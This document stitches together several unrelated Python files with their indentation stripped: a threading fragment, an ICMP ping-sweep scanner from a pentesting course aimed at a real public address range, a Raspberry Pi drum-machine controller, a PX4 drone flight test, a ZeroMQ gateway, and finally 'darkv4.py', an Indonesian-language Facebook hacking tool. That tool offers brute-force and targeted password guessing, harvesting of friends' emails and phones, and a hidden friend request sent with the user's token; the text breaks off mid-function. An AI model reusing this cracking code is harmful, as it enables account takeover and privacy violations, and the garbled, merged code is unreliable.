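    ready.set()    # wake up anyone blocked in ready.wait()

def consumer_with_event():
    ready.wait()   # block until producer_with_event() has signalled
    print "Consumer got", item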
|
icmp_fast_scan.py
|
#####################################
# Python para Pentesters #
# https://solyd.com.br/treinamentos #
#####################################
import random
import socket
import time
import ipaddress
import struct
from threading import Thread
def checksum(source_string):
sum = 0
count_to = (len(source_string) / 2) * 2
count = 0
while count < count_to:
this_val = ord(source_string[count + 1]) * 256 + ord(source_string[count])
sum = sum + this_val
sum = sum & 0xffffffff
count = count + 2
if count_to < len(source_string):
sum = sum + ord(source_string[len(source_string) - 1])
sum = sum & 0xffffffff
sum = (sum >> 16) + (sum & 0xffff)
sum = sum + (sum >> 16)
answer = ~sum
answer = answer & 0xffff
answer = answer >> 8 | (answer << 8 & 0xff00)
return answer
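# This is the usual one's-complement Internet checksum used by ICMP (RFC 1071),
# computed over 16-bit little-endian words with the carries folded back in.
# Worked example (added for illustration): for the two-byte buffer '\x45\x00'
# the loop reads the word 0x0045, the folded 16-bit complement is
# ~0x0045 & 0xffff = 0xffba, and the final byte swap returns 0xbaff.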
def create_packet(id):
header = struct.pack('bbHHh', 8, 0, 0, id, 1)
data = 192 * 'Q'
my_checksum = checksum(header + data)
header = struct.pack('bbHHh', 8, 0, socket.htons(my_checksum), id, 1)
return header + data
def ping(addr, timeout=1):
try:
my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
except Exception as e:
print e
packet_id = int((id(timeout) * random.random()) % 65535)
packet = create_packet(packet_id)
my_socket.connect((addr, 80))
my_socket.sendall(packet)
my_socket.close()
def rotate(addr, file_name, wait, responses):
print "Sending Packets", time.strftime("%X %x %Z")
for ip in addr:
ping(str(ip))
time.sleep(wait)
print "All packets sent", time.strftime("%X %x %Z")
print "Waiting for all responses"
time.sleep(2)
# Stop listening
global SIGNAL
SIGNAL = False
ping('127.0.0.1') # Final ping to trigger the false signal in listen
print len(responses), "hosts found!"
print "Writing File"
hosts = []
for response in sorted(responses):
ip = struct.unpack('BBBB', response)
ip = str(ip[0]) + "." + str(ip[1]) + "." + str(ip[2]) + "." + str(ip[3])
hosts.append(ip)
file = open(file_name, 'w')
file.write(str(hosts))
print "Done", time.strftime("%X %x %Z")
def listen(responses):
global SIGNAL
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.bind(('', 1))
print "Listening"
while SIGNAL:
packet = s.recv(1024)[:20][-8:-4]
responses.append(packet)
print "Stop Listening"
s.close()
SIGNAL = True
responses = []
ips = '200.131.0.0/20' # Internet network
wait = 0.002 # Adjust this based in your bandwidth (Faster link is Lower wait)
file_name = 'log1.txt'
ip_network = ipaddress.ip_network(unicode(ips), strict=False)
t_server = Thread(target=listen, args=[responses])
t_server.start()
t_ping = Thread(target=rotate, args=[ip_network, file_name, wait, responses])
t_ping.start()
|
MasterConroller.py
|
import RPi.GPIO as GPIO
import os
import threading
import time
from DrumpadService import DrumpadService
from LoopService import LoopService
from DisplayLCD import DisplayLCD
class MasterController:
def __init__(self):
self.drumpadService = DrumpadService()
self.loopService = LoopService()
self.displayLCD = DisplayLCD()
# list containing strings of drums available
self.drumList = None
# what seat is currently selected in drumlist
self.drumListIndex = 0
# list containing strings of songs available
self.songList = None
# what seat is currently selected in songlist
self.songListIndex = 0
# list containing strings of menu options available
self.menuList = None
# what seat is currently selected in menulist
self.menuListIndex = 0
# 0 = menulist, 1 = drumList, 2 = songList
self.listPicked = 0
self.DRUMPATH = "../Sounds/Drums"
self.SONGPATH = "../Sounds/Songs"
self.initializeDrumList(self.DRUMPATH)
self.initializeSongList(self.SONGPATH)
self.initializeMenuList()
self.displayLCD.displayList("Menu", self.menuList, self.menuListIndex)
# Select the GPIO pin numbers for the buttons
self.BACK_BUTTON = 12
self.SELECT_BUTTON = 16
self.UP_BUTTON = 20
self.DOWN_BUTTON = 21
self.initializeScreenButtons()
def initializeDrumList(self, path):
self.drumList = os.listdir(path)
def initializeSongList(self, path):
self.songList = os.listdir(path)
def initializeMenuList(self):
self.menuList = ["Choose Drums", "Choose Song", "New Song"]
def initializeScreenButtons(self):
print("Initializing Interups for screen buttons")
GPIO.setup(self.BACK_BUTTON, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.SELECT_BUTTON, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.UP_BUTTON, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.DOWN_BUTTON, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.add_event_detect(self.BACK_BUTTON, GPIO.RISING, callback=lambda x: self.back(), bouncetime=300)
GPIO.add_event_detect(self.SELECT_BUTTON, GPIO.RISING, callback=lambda x: self.select(), bouncetime=300)
GPIO.add_event_detect(self.UP_BUTTON, GPIO.RISING, callback=lambda x: self.up(), bouncetime=300)
GPIO.add_event_detect(self.DOWN_BUTTON, GPIO.RISING, callback=lambda x: self.down(), bouncetime=300)
#TODO
def up(self):
if(self.listPicked == 0):
self.menuListIndex = (self.menuListIndex -1)%len(self.menuList)
# display updated menu list on screen
self.displayLCD.up("Menu", self.menuList, self.menuListIndex)
elif(self.listPicked == 1):
self.drumListIndex = (self.drumListIndex -1)%len(self.drumList)
# display updated drum list on screen
self.displayLCD.up("Drums", self.drumList, self.drumListIndex)
elif(self.listPicked == 2):
self.songListIndex = (self.songListIndex -1)%len(self.songList)
# display updated song list on screen
self.displayLCD.up("Songs", self.songList, self.songListIndex)
#TODO
def down(self):
if(self.listPicked == 0):
self.menuListIndex = (self.menuListIndex +1)%len(self.menuList)
# display updated menu list on screen
self.displayLCD.down("Menu", self.menuList, self.menuListIndex)
elif(self.listPicked == 1):
self.drumListIndex = (self.drumListIndex +1)%len(self.drumList)
# display updated drum list on screen
self.displayLCD.down("Drums", self.drumList, self.drumListIndex)
elif(self.listPicked == 2):
self.songListIndex = (self.songListIndex +1)%len(self.songList)
# display updated song list on screen
self.displayLCD.down("Songs", self.songList, self.songListIndex)
#TODO
def select(self):
if(self.listPicked == 0):
pass
if(self.menuListIndex == 0):
self.listPicked += 1
# Switch list on drum display
self.displayLCD.displayList("Drums", self.drumList, self.drumListIndex)
elif(self.menuListIndex == 1):
self.listPicked += 2
# Switch list on song display
self.displayLCD.displayList("Songs", self.songList, self.songListIndex)
elif(self.menuListIndex == 2):
# Reset loop player
self.resetLoopService()
# display screen that new song is read
self.displayLCD.showSuccess("Starting NewSong")
# display menuList again after some time
self.displayLCD.displayList("Menu", self.menuList, self.menuListIndex)
elif(self.listPicked == 1):
self.drumpadService.changeDrums(self.drumListIndex)
# Display "drums X picked"
self.displayLCD.showSuccess("Drums_"+str(self.drumListIndex)+" Selected")
elif(self.listPicked == 2):
# Display "no sounds available at this moment"
pass
#TODO
def back(self):
if(self.listPicked == 0):
pass
elif(self.listPicked == 1 or self.listPicked == 2):
self.listPicked = 0
# display menuList
self.displayLCD.displayList("Menu", self.menuList, self.menuListIndex)
#TODO
def resetLoopService(self):
self.loopService = None
self.loopService = LoopService()
pass
#TODO
def runDrumService(self):
t1 = threading.Thread(target=self.drumpadService.mainDrum)  # pass the callable, do not call it here
t1.start()
#TODO
def runLoopService(self):
t1 = threading.Thread(target=self.loopService.main)  # pass the callable, do not call it here
t1.start()
pass
def main():
controller = MasterController()
controller.runDrumService()
if __name__ == '__main__':main()
|
mavros_offboard_posctl_test.py
|
#!/usr/bin/env python2
#***************************************************************************
#
# Copyright (c) 2015 PX4 Development Team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# 3. Neither the name PX4 nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#***************************************************************************/
#
# @author Andreas Antener <andreas@uaventure.com>
#
# The shebang of this file is currently Python2 because some
# dependencies such as pymavlink don't play well with Python3 yet.
from __future__ import division
PKG = 'px4'
import rospy
import math
import numpy as np
from geometry_msgs.msg import PoseStamped, Quaternion
from mavros_msgs.msg import ExtendedState
from mavros_test_common import MavrosTestCommon
from std_msgs.msg import Header
from threading import Thread
from tf.transformations import quaternion_from_euler
class MavrosOffboardPosctlTest(MavrosTestCommon):
"""
Tests flying a path in offboard control by sending position setpoints
via MAVROS.
For the test to be successful it needs to reach all setpoints in a certain time.
FIXME: add flight path assertion (needs transformation from ROS frame to NED)
"""
def setUp(self):
super(MavrosOffboardPosctlTest, self).setUp()
self.pos = PoseStamped()
self.radius = 1
self.pos_setpoint_pub = rospy.Publisher(
'mavros/setpoint_position/local', PoseStamped, queue_size=1)
# send setpoints in a separate thread to better prevent failsafe
self.pos_thread = Thread(target=self.send_pos, args=())
self.pos_thread.daemon = True
self.pos_thread.start()
def tearDown(self):
pass
#
# Helper methods
#
def send_pos(self):
rate = rospy.Rate(10) # Hz
self.pos.header = Header()
self.pos.header.frame_id = "base_footprint"
while not rospy.is_shutdown():
self.pos.header.stamp = rospy.Time.now()
self.pos_setpoint_pub.publish(self.pos)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
def is_at_position(self, x, y, z, offset):
"""offset: meters"""
rospy.logdebug(
"current position | x:{0:.2f}, y:{1:.2f}, z:{2:.2f}".format(
self.local_position.pose.position.x, self.local_position.pose.
position.y, self.local_position.pose.position.z))
desired = np.array((x, y, z))
pos = np.array((self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
return np.linalg.norm(desired - pos) < offset
def reach_position(self, x, y, z, timeout):
"""timeout(int): seconds"""
# set a position setpoint
self.pos.pose.position.x = x
self.pos.pose.position.y = y
self.pos.pose.position.z = z
rospy.loginfo(
"attempting to reach position | x: {0}, y: {1}, z: {2} | current position x: {3:.2f}, y: {4:.2f}, z: {5:.2f}".
format(x, y, z, self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
# For demo purposes we will lock yaw/heading to north.
yaw_degrees = 0 # North
yaw = math.radians(yaw_degrees)
quaternion = quaternion_from_euler(0, 0, yaw)
self.pos.pose.orientation = Quaternion(*quaternion)
# does it reach the position in 'timeout' seconds?
loop_freq = 2 # Hz
rate = rospy.Rate(loop_freq)
reached = False
for i in xrange(timeout * loop_freq):
if self.is_at_position(self.pos.pose.position.x,
self.pos.pose.position.y,
self.pos.pose.position.z, self.radius):
rospy.loginfo("position reached | seconds: {0} of {1}".format(
i / loop_freq, timeout))
reached = True
break
rate.sleep()
self.assertTrue(reached, (
"took too long to get to position | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} | timeout(seconds): {3}".
format(self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z, timeout)))
#
# Test method
#
def test_posctl(self):
"""Test offboard position control"""
# make sure the simulation is ready to start the mission
self.wait_for_topics(60)
self.wait_on_landed_state(ExtendedState.LANDED_STATE_ON_GROUND, 10, -1)
self.set_mode("OFFBOARD", 5)
self.set_arm(True, 5)
rospy.loginfo("run mission")
positions = ((0, 0, 0), (2, 2, 2), (2, -2, 2), (-2, -2, 2), (2, 2, 2))
for i in xrange(len(positions)):
self.reach_position(positions[i][0], positions[i][1],
positions[i][2], 18)
self.set_arm(False, 5)
if __name__ == '__main__':
import rostest
rospy.init_node('test_node', anonymous=True)
rostest.rosrun(PKG, 'mavros_offboard_posctl_test',
MavrosOffboardPosctlTest)
|
mq.py
|
import json
import time
from dataclasses import dataclass, asdict
from json import JSONDecodeError
from threading import Thread
import zmq
import logging
from ..consts import RUNNING, INIT, STOPPED
from ..dtypes import Message
from queue import Queue, Empty
from zolo.consts import USER_MSG_GATEWAY
log = logging.getLogger(__name__)
#
# INIT = "INIT"
# RUNNING = "RUNNING"
# STOPPED = "STOPPED"
#
#
# @dataclass(frozen=True)
# class Message:
# cmd: str
# payload: dict
class ZmqGateway:
def __init__(self, host: str):
self._state = INIT
self._thread: Thread = None
self._ctx = zmq.Context()
self._sock = self._ctx.socket(zmq.PAIR)
self._poller = zmq.Poller()
self._poller.register(self._sock, zmq.POLLIN)
self._sock.bind(f"{host}")
super().__init__()
@property
def is_running(self):
return self._state == RUNNING
    def _poll(self, q: Queue):
        self._state = RUNNING
        while self.is_running:
            try:
                msg = self._poll_once()
            except TimeoutError:
                continue
            if msg is not None:  # invalid payloads were already logged by _poll_once
                q.put(msg)
        self._state = STOPPED
def _poll_once(self):
res = self._poller.poll(timeout=1)
if not res:
raise TimeoutError
msg: bytes = self._sock.recv()
if msg:
try:
                msg = json.loads(msg)  # the "encoding" kwarg was removed in Python 3.9; UTF-8 bytes decode automatically
return Message(cmd=msg["cmd"], payload=msg["payload"])
except (KeyError, JSONDecodeError):
log.warning(f"invalid msg: {msg}")
return
raise TimeoutError
def reboot(self, q: Queue):
self.stop()
self.start(q)
    def stop(self):
        if self.is_running:
            self._state = STOPPED
            self._thread.join(5)
            self._poller.unregister(self._sock)
            if self._thread.is_alive():  # join() timed out and the poll loop never exited
                log.error("Failed to stop the polling thread within 5 seconds")
    def start(self, q: Queue):
        if not self.is_running:
            # stop() unregisters the socket, so re-register it before polling again;
            # Poller.register is idempotent for an already-registered socket
            self._poller.register(self._sock, zmq.POLLIN)
            self._thread = Thread(target=self._poll, args=(q,))
            self._thread.start()
def main():
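    # Manual smoke test: start the gateway bound on tcp://*:5555, connect a PAIR
    # client (assumes USER_MSG_GATEWAY points at that same endpoint), send a START
    # command whenever the queue has been idle for 3 seconds, and print whatever
    # the gateway delivers.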
context = zmq.Context()
q = Queue()
gw = ZmqGateway("tcp://*:5555")
gw.start(q)
client = context.socket(zmq.PAIR)
client.connect(USER_MSG_GATEWAY)
while True:
try:
msg = q.get(timeout=3)
except Empty:
res = json.dumps(
asdict(Message(
"START",
dict(timeout=5)
))
).encode("utf8")
client.send(res)
except KeyboardInterrupt:
gw.stop()
break
else:
print(msg)
if __name__ == '__main__':
main()
|
darkv4.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m MR FARID86 \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/DARKFARID\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/farid.nick1\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
